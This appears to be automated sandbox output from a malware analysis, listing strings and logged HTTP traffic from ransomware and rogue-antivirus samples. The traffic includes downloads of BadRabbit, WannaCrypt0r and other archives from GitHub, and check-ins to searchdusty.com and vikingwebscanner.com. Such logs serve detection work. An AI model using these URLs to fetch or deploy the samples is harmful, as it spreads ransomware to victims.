          Source: svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000003.314438636.0000017D58448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000003.291362782.0000017D58432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.314750739.0000017D58413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.291362782.0000017D58432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000005.00000003.314153614.0000017D58446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000003.291362782.0000017D58432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000005.00000003.314299520.0000017D5843C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.291362782.0000017D58432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000005.00000002.315090593.0000017D5844F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314153614.0000017D58446000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314438636.0000017D58448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8
          Source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: Endermanch@Cerber5.exe, 00000017.00000003.463681172.00000000050EA000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000017.00000003.397567876.00000000050D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/downlo&#097;d/download-easy.html.en
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/results?search_query=Install
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.422769367.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/company/
          Source: avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/2/j/mj7l5rSw0yVb_vlWAYkK_YBwk.css
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/31/3111cd045f263a072f504780b8535840.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/37/37a02b5dc7a51abac55d8a5b6c865f0e.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/46/462e92b9e3792be37a1c3fdefb26af28.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/a2/a27610a94f8a0827a6a937c869d95a3e.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/a6/a6a296b741b51880ae8a9b04a67cfe3f.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/a7/a79b81aa025e9edb2244e38581c868ad.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/f0/f0597b6727cc67dceebc4e3a87caf571.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/f4/f47b1b3d8194c36ce660324ab55a04fe.png
          Source: avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/s3/home-static/_/k/z/KVcAdY4g9KYsFy1_kLM5XFnfc.css
          Source: unknownDNS traffic detected: queries for: github.com
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=C9vZDDi53VxcYaUEaKZJVHqVGblx/XyLVpZgtY1YUcQS86qd; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
